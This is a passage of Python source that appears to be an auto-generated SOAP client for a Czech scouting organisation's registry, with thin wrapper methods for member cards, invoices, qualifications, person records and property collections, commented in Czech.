# Načíst seznam členských karet pro jednotku
def MemberCardAllUnit(self, ID_Login, ID_Unit, ID, IncludeChild, DisplayName=None, ID_MemberCardType=None, OnlyValid=None, PersonWithoutMeberCard=None, ValidTo=None, OnlyInvalid=None):
return self._client.service.MemberCardAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "IncludeChild": IncludeChild, "DisplayName": DisplayName, "ID_MemberCardType": ID_MemberCardType, "OnlyValid": OnlyValid, "PersonWithoutMeberCard": PersonWithoutMeberCard, "ValidTo": ValidTo, "OnlyInvalid": OnlyInvalid})
# Načíst všechny faktury za členské karty
def MemberCardInvoiceAll(self, ID_Login, ID_Unit, ID, ID_MemberCardInvoiceGenerate, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
return self._client.service.MemberCardInvoiceAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_MemberCardInvoiceGenerate": ID_MemberCardInvoiceGenerate, "DateGeneratingFrom": DateGeneratingFrom, "DateGeneratingTo": DateGeneratingTo, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState})
# Načíst detail faktury za členské karty
def MemberCardInvoiceDetail(self, ID_Login, ID):
return self._client.service.MemberCardInvoiceDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam generování faktur za členské karty
def MemberCardInvoiceGenerateAll(self, ID_Login, ID, ID_Person, ID_Error, ID_MemberCardInvoiceGenerateState=None):
return self._client.service.MemberCardInvoiceGenerateAll({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Error": ID_Error, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState})
# Založit generování faktur za členské karty
def MemberCardInvoiceGenerateInsert(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateInsert({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Upravit generování faktur za členské karty
def MemberCardInvoiceGenerateUpdate(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateUpdate({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Vygenerovat faktury
def MemberCardInvoiceGenerateUpdateGenerate(self, ID_Login, ID, DateGenerating, ID_Person, ID_Error, Person=None, ID_MemberCardInvoiceGenerateState=None, MemberCardInvoiceGenerateState=None, Error=None):
return self._client.service.MemberCardInvoiceGenerateUpdateGenerate({"ID_Login": ID_Login, "ID": ID, "DateGenerating": DateGenerating, "ID_Person": ID_Person, "ID_Error": ID_Error, "Person": Person, "ID_MemberCardInvoiceGenerateState": ID_MemberCardInvoiceGenerateState, "MemberCardInvoiceGenerateState": MemberCardInvoiceGenerateState, "Error": Error})
# Načíst seznam stavů faktury za členské karty
def MemberCardInvoiceStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.MemberCardInvoiceStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Aktivuje karty podkladů pro tisk karet
def MemberCardPrintActivate(self, ID_Login, ID, ValidFrom):
return self._client.service.MemberCardPrintActivate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom})
# Přidá karty do podkladu pro tisk karet
def MemberCardPrintAddCards(self, ID_Login, ID):
return self._client.service.MemberCardPrintAddCards({"ID_Login": ID_Login, "ID": ID})
# Načíst detail podkladu pro tisk karty
def MemberCardPrintDetail(self, ID_Login, ID):
return self._client.service.MemberCardPrintDetail({"ID_Login": ID_Login, "ID": ID})
# Generování souboru s podklady pro tisk karet
def MemberCardPrintUpdateGenerating(self, ID_Login, ID):
return self._client.service.MemberCardPrintUpdateGenerating({"ID_Login": ID_Login, "ID": ID})
# Ukončit platnost prošlých karet
def MemberCardUpdateExpired(self, ID_Login):
return self._client.service.MemberCardUpdateExpired({"ID_Login": ID_Login})
# Načíst seznam členství osob v jednotce pro zařazení do google skupiny
def MembershipAllGoogleGroup(self, ID_Login, ID_GoogleGroup, OnlyDirectMember, Person=None):
return self._client.service.MembershipAllGoogleGroup({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "OnlyDirectMember": OnlyDirectMember, "Person": Person})
# Načíst seznam užívání nemovitosti
def OccupationAllRealtyCollection(self, ID_Login, ID_RealtyCollection, IsActive, IsBorrowable, ID_Application):
return self._client.service.OccupationAllRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "IsActive": IsActive, "IsBorrowable": IsBorrowable, "ID_Application": ID_Application})
# Načíst seznam majetkových vztahů
def OwnerTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.OwnerTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst osoby podle mailů členů google skupiny
def PersonAllGoogleGroup(self, ID_Login, ID_GoogleGroup):
return self._client.service.PersonAllGoogleGroup({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup})
# Vrátí
def PersonAllJournalRover(self, ID_Login, Unit_ID):
return self._client.service.PersonAllJournalRover({"ID_Login": ID_Login, "Unit_ID": Unit_ID})
# Načíst počet vydaných karet za jednotlivé roky
def MemberCardAllSummary(self, ID_Login):
return self._client.service.MemberCardAllSummary({"ID_Login": ID_Login})
# Zneplatnit email osoby nebo jednotky
def ContactUpdateInvalid(self, ID_Login, Mail=None):
return self._client.service.ContactUpdateInvalid({"ID_Login": ID_Login, "Mail": Mail})
# Načíst seznam podkladů pro tisk karet
def MemberCardPrintAll(self, ID_Login, ID, ID_MemberCardPrintState=None):
return self._client.service.MemberCardPrintAll({"ID_Login": ID_Login, "ID": ID, "ID_MemberCardPrintState": ID_MemberCardPrintState})
# Stáhnout soubor s podklady pro tisk karet
def MemberCardPrintDetailDownload(self, ID_Login, ID):
return self._client.service.MemberCardPrintDetailDownload({"ID_Login": ID_Login, "ID": ID})
# Založit podklad pro tisk karet
def MemberCardPrintInsert(self, ID_Login, ID, DateCreate, DateGenerated, Count, ID_MemberCardPrintState=None, MemberCardPrintState=None, Error=None):
return self._client.service.MemberCardPrintInsert({"ID_Login": ID_Login, "ID": ID, "DateCreate": DateCreate, "DateGenerated": DateGenerated, "Count": Count, "ID_MemberCardPrintState": ID_MemberCardPrintState, "MemberCardPrintState": MemberCardPrintState, "Error": Error})
# Pozadavek na opetovne vygenerovani souboru s podklady pro tisk
def MemberCardPrintUpdateGenerate(self, ID_Login, ID, ValidFrom, ValidTo):
return self._client.service.MemberCardPrintUpdateGenerate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo})
# Definitivni smazani docasne oznacenych osob
def PersonDeleteInactive(self, ID_Login):
return self._client.service.PersonDeleteInactive({"ID_Login": ID_Login})
# Načtení informací o osobě
def PersonDetailHomepage(self, ID_Login, ID):
return self._client.service.PersonDetailHomepage({"ID_Login": ID_Login, "ID": ID})
# Načíst detail přihlášku osoby
def PersonOtherDetailUnitEnroll(self, ID_Login, ID, LoadUnitEnroll):
return self._client.service.PersonOtherDetailUnitEnroll({"ID_Login": ID_Login, "ID": ID, "LoadUnitEnroll": LoadUnitEnroll})
# Smazat citlivé údaje
def PersonOtherUpdateClear(self, ID_Login):
return self._client.service.PersonOtherUpdateClear({"ID_Login": ID_Login})
# Upravit odvolání souhlasů z přihlášky osoby
def PersonOtherUpdateReject(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
return self._client.service.PersonOtherUpdateReject({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_DistrictBirth": ID_DistrictBirth, "ID_Assurance": ID_Assurance, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "DateChangeSocialNetwork": DateChangeSocialNetwork, "DateChangeMarketing": DateChangeMarketing, "DateChangeDataStorage": DateChangeDataStorage, "DateChangeAudiovisual": DateChangeAudiovisual, "IsRPS": IsRPS, "IsEPS": IsEPS, "IsEduParticipantExt": IsEduParticipantExt, "OnlyValidate": OnlyValidate, "ID_EventCongress": ID_EventCongress, "ID_TempFileHealth": ID_TempFileHealth, "ID_DocumentHealth": ID_DocumentHealth, "IdCardValidTo": IdCardValidTo, "IsAdult": IsAdult, "BirthCity": BirthCity, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "Person": Person, "MaidenName": MaidenName, "DistrictBirth": DistrictBirth, "Assurance": Assurance, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Note": Note, "ParentNote": ParentNote, "IdCardNumber": IdCardNumber})
# Upravit přihlášku osoby
def PersonOtherUpdateUnitEnroll(self, ID_Login, ID, ID_UnitEnrollTempFile, UnitEnrollExtension=None):
return self._client.service.PersonOtherUpdateUnitEnroll({"ID_Login": ID_Login, "ID": ID, "ID_UnitEnrollTempFile": ID_UnitEnrollTempFile, "UnitEnrollExtension": UnitEnrollExtension})
# Potvrdit přihlášku osoby
def PersonOtherUpdateUnitEnrollCondition(self, ID_Login, ID, ID_Person, ID_DistrictBirth, ID_Assurance, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, DateChangeSocialNetwork, DateChangeMarketing, DateChangeDataStorage, DateChangeAudiovisual, IsRPS, IsEPS, IsEduParticipantExt, OnlyValidate, ID_EventCongress, ID_TempFileHealth, ID_DocumentHealth, IdCardValidTo, IsAdult, BirthCity=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, Person=None, MaidenName=None, DistrictBirth=None, Assurance=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Note=None, ParentNote=None, IdCardNumber=None):
return self._client.service.PersonOtherUpdateUnitEnrollCondition({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_DistrictBirth": ID_DistrictBirth, "ID_Assurance": ID_Assurance, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "DateChangeSocialNetwork": DateChangeSocialNetwork, "DateChangeMarketing": DateChangeMarketing, "DateChangeDataStorage": DateChangeDataStorage, "DateChangeAudiovisual": DateChangeAudiovisual, "IsRPS": IsRPS, "IsEPS": IsEPS, "IsEduParticipantExt": IsEduParticipantExt, "OnlyValidate": OnlyValidate, "ID_EventCongress": ID_EventCongress, "ID_TempFileHealth": ID_TempFileHealth, "ID_DocumentHealth": ID_DocumentHealth, "IdCardValidTo": IdCardValidTo, "IsAdult": IsAdult, "BirthCity": BirthCity, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "Person": Person, "MaidenName": MaidenName, "DistrictBirth": DistrictBirth, "Assurance": Assurance, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Note": Note, "ParentNote": ParentNote, "IdCardNumber": IdCardNumber})
# Stáhnout dekret kvalifikace
def PersonQualificationLetterDownload(self, ID_Login, ID_Qualification):
return self._client.service.PersonQualificationLetterDownload({"ID_Login": ID_Login, "ID_Qualification": ID_Qualification})
# Editace výřezu fotografie osoby
def PersonUpdatePhotoSize(self, ID_Login, ID, PhotoX, PhotoY, PhotoSize):
return self._client.service.PersonUpdatePhotoSize({"ID_Login": ID_Login, "ID": ID, "PhotoX": PhotoX, "PhotoY": PhotoY, "PhotoSize": PhotoSize})
# Načíst seznam členských karet
def MemberCardAllRequestCount(self, ID_Login):
return self._client.service.MemberCardAllRequestCount({"ID_Login": ID_Login})
# Načíst seznam členských karet připravených k vydání
def MemberCardAllRequest(self, ID_Login, ID_MemberCardPrint):
return self._client.service.MemberCardAllRequest({"ID_Login": ID_Login, "ID_MemberCardPrint": ID_MemberCardPrint})
# Načíst platnost členské karty dle jejího čísla
def MemberCardDetailValid(self, ID_Login, ID_Application, BitOutput, DisplayName=None):
return self._client.service.MemberCardDetailValid({"ID_Login": ID_Login, "ID_Application": ID_Application, "BitOutput": BitOutput, "DisplayName": DisplayName})
# Zneplatnit kartu
def MemberCardUpdateInvalid(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
return self._client.service.MemberCardUpdateInvalid({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "Year": Year, "DateCreate": DateCreate, "Price": Price, "IsAuthorized": IsAuthorized, "IsPaid": IsPaid, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSchool": ID_PersonSchool, "ID_PersonRegistration": ID_PersonRegistration, "ID_DocumentMediumPhoto": ID_DocumentMediumPhoto, "ID_MemberCardState": ID_MemberCardState, "MemberCardState": MemberCardState, "DisplayName": DisplayName, "Person": Person, "ID_MemberCardType": ID_MemberCardType, "MemberCardType": MemberCardType, "PersonSchool": PersonSchool, "PersonSchoolCity": PersonSchoolCity, "UnitStredisko": UnitStredisko, "LeaderContact": LeaderContact, "StorageMediumPhoto": StorageMediumPhoto})
# Stáhnout dekret kvalifikace
def QualificationDownload(self, ID_Login, ID):
return self._client.service.QualificationDownload({"ID_Login": ID_Login, "ID": ID})
# Založit chybu kvalifikace
def QualificationMistakeInsert(self, ID_Login, ID, ID_Qualification, ID_PersonCreated, DateCreated, PersonCreated=None, Description=None):
return self._client.service.QualificationMistakeInsert({"ID_Login": ID_Login, "ID": ID, "ID_Qualification": ID_Qualification, "ID_PersonCreated": ID_PersonCreated, "DateCreated": DateCreated, "PersonCreated": PersonCreated, "Description": Description})
# Načíst seznam žádostí o kvalifikaci
def QualificationRequestAll(self, ID_Login, ID_Person, ID, ID_QualificationType, ID_QualificationRequestState=None):
return self._client.service.QualificationRequestAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_QualificationType": ID_QualificationType, "ID_QualificationRequestState": ID_QualificationRequestState})
# Načíst detail žádosti o kvalifikaci
def QualificationRequestDetail(self, ID_Login, ID):
return self._client.service.QualificationRequestDetail({"ID_Login": ID_Login, "ID": ID})
# Stáhnout sken s dekretem
def QualificationRequestDetailDownloadLetter(self, ID_Login, ID):
return self._client.service.QualificationRequestDetailDownloadLetter({"ID_Login": ID_Login, "ID": ID})
# Založit žádost o kvalifikaci
def QualificationRequestInsert(self, ID_Login, ID, ID_Person, ID_PersonCreated, ID_QualificationType, ValidFrom, ValidTo, DateCreate, ID_PersonDecision, ID_TempFileScan, ID_Document, Person=None, PersonCreated=None, QualificationType=None, LetterNumber=None, LetterExtension=None, ID_QualificationRequestState=None, QualificationRequestState=None, Course=None, Decision=None, PersonDecision=None):
return self._client.service.QualificationRequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonCreated": ID_PersonCreated, "ID_QualificationType": ID_QualificationType, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "DateCreate": DateCreate, "ID_PersonDecision": ID_PersonDecision, "ID_TempFileScan": ID_TempFileScan, "ID_Document": ID_Document, "Person": Person, "PersonCreated": PersonCreated, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "LetterExtension": LetterExtension, "ID_QualificationRequestState": ID_QualificationRequestState, "QualificationRequestState": QualificationRequestState, "Course": Course, "Decision": Decision, "PersonDecision": PersonDecision})
# Načíst seznam stavů žádosti o kvalifikace
def QualificationRequestStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.QualificationRequestStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Upravit žádost o kvalifikaci
def QualificationRequestUpdate(self, ID_Login, ID, ID_Person, ID_PersonCreated, ID_QualificationType, ValidFrom, ValidTo, DateCreate, ID_PersonDecision, ID_TempFileScan, ID_Document, Person=None, PersonCreated=None, QualificationType=None, LetterNumber=None, LetterExtension=None, ID_QualificationRequestState=None, QualificationRequestState=None, Course=None, Decision=None, PersonDecision=None):
return self._client.service.QualificationRequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonCreated": ID_PersonCreated, "ID_QualificationType": ID_QualificationType, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "DateCreate": DateCreate, "ID_PersonDecision": ID_PersonDecision, "ID_TempFileScan": ID_TempFileScan, "ID_Document": ID_Document, "Person": Person, "PersonCreated": PersonCreated, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "LetterExtension": LetterExtension, "ID_QualificationRequestState": ID_QualificationRequestState, "QualificationRequestState": QualificationRequestState, "Course": Course, "Decision": Decision, "PersonDecision": PersonDecision})
# Načíst detail typu kvalfikace
def QualificationTypeDetail(self, ID_Login, ID):
return self._client.service.QualificationTypeDetail({"ID_Login": ID_Login, "ID": ID})
# Rozeslat varování o konci platnosti a možnosti prodloužení
def QualificationUpdateSendWarning(self, ID_Login):
return self._client.service.QualificationUpdateSendWarning({"ID_Login": ID_Login})
# Upravit kvalifikaci
def QualificationUpload(self, ID_Login, ID, ID_TempFile, LetterExtension=None):
return self._client.service.QualificationUpload({"ID_Login": ID_Login, "ID": ID, "ID_TempFile": ID_TempFile, "LetterExtension": LetterExtension})
# Načíst seznam nemovitostí pro soubor nemovitostí
def RealtyAllRealtyCollection(self, ID_Login, ID_RealtyCollection, IsActive):
return self._client.service.RealtyAllRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "IsActive": IsActive})
# Načíst seznam správců souboru nemovitostí
def RealtyCollectionAdminAll(self, ID_Login, ID_RealtyCollection, ID, ID_Person):
return self._client.service.RealtyCollectionAdminAll({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "ID": ID, "ID_Person": ID_Person})
# Smazat
def RealtyCollectionAdminDelete(self, ID_Login, ID):
return self._client.service.RealtyCollectionAdminDelete({"ID_Login": ID_Login, "ID": ID})
# Založit
def RealtyCollectionAdminInsert(self, ID_Login, ID, ID_RealtyCollection, ID_Person, RealtyCollection=None, Person=None):
return self._client.service.RealtyCollectionAdminInsert({"ID_Login": ID_Login, "ID": ID, "ID_RealtyCollection": ID_RealtyCollection, "ID_Person": ID_Person, "RealtyCollection": RealtyCollection, "Person": Person})
# Smazat soubor nemovitostí
def RealtyCollectionDelete(self, ID_Login, ID, Note=None):
return self._client.service.RealtyCollectionDelete({"ID_Login": ID_Login, "ID": ID, "Note": Note})
# Načíst detail souboru nemovitostí
def RealtyCollectionDetail(self, ID_Login, ID, IsActive):
return self._client.service.RealtyCollectionDetail({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive})
# Načíst seznam umístění souboru nemovitostí
def RealtyCollectionLocationAll(self, ID_Login, ID_RealtyCollection, ID, ID_RealtyLocation=None):
return self._client.service.RealtyCollectionLocationAll({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "ID": ID, "ID_RealtyLocation": ID_RealtyLocation})
# Smazat umístění souboru nemovitostí
def RealtyCollectionLocationDeleteRealtyCollection(self, ID_Login, ID_RealtyCollection):
return self._client.service.RealtyCollectionLocationDeleteRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection})
# Založit umístění souboru nemovitostí
def RealtyCollectionLocationInsert(self, ID_Login, ID, ID_RealtyCollection, RealtyCollection=None, ID_RealtyLocation=None, RealtyLocation=None):
return self._client.service.RealtyCollectionLocationInsert({"ID_Login": ID_Login, "ID": ID, "ID_RealtyCollection": ID_RealtyCollection, "RealtyCollection": RealtyCollection, "ID_RealtyLocation": ID_RealtyLocation, "RealtyLocation": RealtyLocation})
# Načíst seznam způsobů dopravy k souboru nemovitostí
def RealtyCollectionTransportAll(self, ID_Login, ID_RealtyCollection, ID, ID_RealtyTransport=None):
return self._client.service.RealtyCollectionTransportAll({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "ID": ID, "ID_RealtyTransport": ID_RealtyTransport})
# Smazat způsoby dopravy k souboru nemovitostí
def RealtyCollectionTransportDeleteRealtyCollection(self, ID_Login, ID_RealtyCollection):
return self._client.service.RealtyCollectionTransportDeleteRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection})
# Založit způsoby dopravy k souboru nemovitostí
def RealtyCollectionTransportInsert(self, ID_Login, ID, ID_RealtyCollection, RealtyCollection=None, ID_RealtyTransport=None, RealtyTransport=None):
return self._client.service.RealtyCollectionTransportInsert({"ID_Login": ID_Login, "ID": ID, "ID_RealtyCollection": ID_RealtyCollection, "RealtyCollection": RealtyCollection, "ID_RealtyTransport": ID_RealtyTransport, "RealtyTransport": RealtyTransport})
# Upravit soubor nemovitostí
def RealtyCollectionUpdate(self, ID_TempFilePhoto, ID_Login, ID, ID_Unit, ID_User, IsActive, GpsLatitude, GpsLongitude, HasAddress, ID_Region, ID_Document, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, Unit=None, UnitRegistrationNumber=None, Owner=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportationMethodsText=None, TransportDescription=None, Locations=None, LocationsText=None, PointsOfInterest=None, Note=None, Region=None, Storage=None):
return self._client.service.RealtyCollectionUpdate({"ID_TempFilePhoto": ID_TempFilePhoto, "ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_User": ID_User, "IsActive": IsActive, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "HasAddress": HasAddress, "ID_Region": ID_Region, "ID_Document": ID_Document, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber, "Owner": Owner, "DisplayName": DisplayName, "Description": Description, "Web": Web, "Street": Street, "City": City, "Postcode": Postcode, "District": District, "TransportationMethods": TransportationMethods, "TransportationMethodsText": TransportationMethodsText, "TransportDescription": TransportDescription, "Locations": Locations, "LocationsText": LocationsText, "PointsOfInterest": PointsOfInterest, "Note": Note, "Region": Region, "Storage": Storage})
# Smazat nemovitost
def RealtyDelete(self, ID_Login, ID, Note=None):
return self._client.service.RealtyDelete({"ID_Login": ID_Login, "ID": ID, "Note": Note})
# Načíst seznam dokumentů
def RealtyDocumentAllOccupation(self, ID_Login, ID, ID_User, ID_Occupation, Location=None):
return self._client.service.RealtyDocumentAllOccupation({"ID_Login": ID_Login, "ID": ID, "ID_User": ID_User, "ID_Occupation": ID_Occupation, "Location": Location})
# Načíst seznam dokumentů
def RealtyDocumentAllRealty(self, ID_Login, ID_Realty, ID, ID_User, Location=None):
return self._client.service.RealtyDocumentAllRealty({"ID_Login": ID_Login, "ID_Realty": ID_Realty, "ID": ID, "ID_User": ID_User, "Location": Location})
# Založit dokument
def RealtyDocumentInsert(self, ID_Login, ID, ID_User, Saved, IsPublic, Size, ID_Realty, ID_Occupation, ID_TempFileDocument, ID_Document, DisplayName=None, Location=None, Origin=None, DownloadName=None, Note=None, Hash=None, Realty=None, Extension=None):
return self._client.service.RealtyDocumentInsert({"ID_Login": ID_Login, "ID": ID, "ID_User": ID_User, "Saved": Saved, "IsPublic": IsPublic, "Size": Size, "ID_Realty": ID_Realty, "ID_Occupation": ID_Occupation, "ID_TempFileDocument": ID_TempFileDocument, "ID_Document": ID_Document, "DisplayName": DisplayName, "Location": Location, "Origin": Origin, "DownloadName": DownloadName, "Note": Note, "Hash": Hash, "Realty": Realty, "Extension": Extension})
# Úprava vazeb dokumentu na ostatní tabulky
def RealtyDocumentUpdateBinding(self, ID_Login, ID, ID_User, Saved, IsPublic, Size, ID_Realty, ID_Occupation, ID_TempFileDocument, ID_Document, DisplayName=None, Location=None, Origin=None, DownloadName=None, Note=None, Hash=None, Realty=None, Extension=None):
return self._client.service.RealtyDocumentUpdateBinding({"ID_Login": ID_Login, "ID": ID, "ID_User": ID_User, "Saved": Saved, "IsPublic": IsPublic, "Size": Size, "ID_Realty": ID_Realty, "ID_Occupation": ID_Occupation, "ID_TempFileDocument": ID_TempFileDocument, "ID_Document": ID_Document, "DisplayName": DisplayName, "Location": Location, "Origin": Origin, "DownloadName": DownloadName, "Note": Note, "Hash": Hash, "Realty": Realty, "Extension": Extension})
# Založit nemovitost do souboru nemovitostí
def RealtyInsertRealtyCollection(self, ID_Login, ID_RealtyCollection, IsPower, ID_TempFilePhoto, LVNumber, Acreage, GpsLatitude, GpsLongitude, RealtyGpsLatitude, RealtyGpsLongitude, DisplayName=None, ID_OwnerType=None, OwnerTypeNote=None, Description=None, Note=None, ID_RegisterType=None, RegisterCode=None, FotogalleryUrl=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None):
return self._client.service.RealtyInsertRealtyCollection({"ID_Login": ID_Login, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ID_TempFilePhoto": ID_TempFilePhoto, "LVNumber": LVNumber, "Acreage": Acreage, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "DisplayName": DisplayName, "ID_OwnerType": ID_OwnerType, "OwnerTypeNote": OwnerTypeNote, "Description": Description, "Note": Note, "ID_RegisterType": ID_RegisterType, "RegisterCode": RegisterCode, "FotogalleryUrl": FotogalleryUrl, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType})
# Načíst seznam umístění
def RealtyLocationAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.RealtyLocationAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam typů dopravy
def RealtyTransportAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.RealtyTransportAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst detail typu nemovitosti
def RealtyTypeDetail(self, ID_Login, ID):
return self._client.service.RealtyTypeDetail({"ID_Login": ID_Login, "ID": ID})
# Nastavit přiřazení nemovitosti do skautské energie
def RealtyUpdateIsPower(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyUpdateIsPower({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": 